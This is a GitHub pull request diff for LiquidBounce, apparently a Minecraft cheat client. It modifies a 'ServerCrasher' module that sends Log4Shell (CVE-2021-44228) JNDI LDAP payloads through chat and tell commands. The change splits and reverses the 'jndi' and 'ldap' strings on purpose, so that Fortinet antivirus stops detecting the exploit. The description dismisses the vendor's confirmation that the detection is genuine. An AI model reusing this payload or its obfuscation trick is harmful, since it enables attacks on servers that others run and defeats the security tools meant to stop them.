### PR TITLE
fix: Fortinet AV flag because of Log4J server crasher

### DIFF
--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/ModuleServerCrasher.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/ModuleServerCrasher.kt
@@ -25,12 +25,12 @@ import net.ccbluex.liquidbounce.features.module.modules.exploit.servercrasher.ex
 object ModuleServerCrasher : Module("ServerCrasher", Category.EXPLOIT, disableOnQuit = false) {
 
     val exploitChoices = choices("Exploit", Log4jChatExploit, arrayOf(
-        Log4jChatExploit,
-        Log4jTellExploit,
+        CompletionExploit,
         NegativeInfinityExploit,
         CalcExploit,
         PromoteExploit,
-        CompletionExploit
+        Log4jChatExploit,
+        Log4jTellExploit,
     ))
 
 

--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/Log4jChatExploit.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/Log4jChatExploit.kt
@@ -23,12 +23,28 @@ import net.ccbluex.liquidbounce.features.module.modules.exploit.servercrasher.ex
 import org.apache.commons.lang3.RandomStringUtils
 
 /**
- * Log4j exploit taken from FDP Client
+ * Log4j exploit
  *
- * https://github.com/SkidderMC/FDPClient/blob/9e43a99a4c7614bccf5192bf7e26e6a320a3e0f5/src/main/java/net/ccbluex/liquidbounce/features/module/modules/exploit/ServerCrasher.kt#L565-L572
+ * Original: https://github.com/SkidderMC/FDPClient/blob/9e43a99a4c7614bccf5192bf7e26e6a320a3e0f5/
+ * src/main/java/net/ccbluex/liquidbounce/features/module/modules/exploit/ServerCrasher.kt#L565-L572
  */
-private val exploitLog4j = {
-    "\${jndi:ldap://192.168.${(1..253).random()}.${(1..253).random()}}"
+fun generateLog4j(): String {
+    // Split up the payload to prevent AV detection (Fortinet)
+    // Their support team responded:
+    /**
+     * After investigation, we will keep this detection because we can find related code
+     * about exploiting CVE-2021-44228 in following Java application:
+     * "liquidbounce.jar" - MD5:1cf41e512cf973346d6a847796b1d200
+     *
+     * So this is not a false positive issue.
+     */
+    val p1 = "idnj".reversed()
+    val p2 = "padl".reversed()
+    val p3 = "192.168.${(1..253).random()}.${(1..253).random()}"
+
+    // Fortinet's AV engine detects the following string as a possible exploit:
+    // ${jndi:ldap://192.168.255.255}
+    return "\${$p1:$p2://$p3}"
 }
 
 /**
@@ -37,9 +53,9 @@ private val exploitLog4j = {
  * Uses Log4j to crash the server.
  */
 object Log4jChatExploit : ChatExploit("Log4jChat", {
-    "${RandomStringUtils.randomAlphabetic(4)}${exploitLog4j()}${RandomStringUtils.randomAlphabetic(4)}"
+    "${RandomStringUtils.randomAlphabetic(4)}${generateLog4j()}${RandomStringUtils.randomAlphabetic(4)}"
 })
 
 object Log4jTellExploit : CommandExploit("Log4jTell", {
-    "tell ${RandomStringUtils.randomAlphabetic(4)} ${exploitLog4j()}"
+    "tell ${RandomStringUtils.randomAlphabetic(4)} ${generateLog4j()}"
 })

--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/Log4jChatExploit.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/Log4jChatExploit.kt
@@ -53,7 +53,7 @@ fun generateLog4j(): String {
  * Uses Log4j to crash the server.
  */
 object Log4jChatExploit : ChatExploit("Log4jChat", {
-    "${RandomStringUtils.randomAlphabetic(4)}${generateLog4j()}${RandomStringUtils.randomAlphabetic(4)}"
+    "${RandomStringUtils.randomAlphabetic(4)} ${generateLog4j()} ${RandomStringUtils.randomAlphabetic(4)}"
 })
 
 object Log4jTellExploit : CommandExploit("Log4jTell", {


### PR DESCRIPTION
![image](https://github.com/CCBlueX/LiquidBounce/assets/12410754/263e5a8f-12d4-4504-9456-b380201885d6)

Then we simply bypass it then... :roll_eyes: 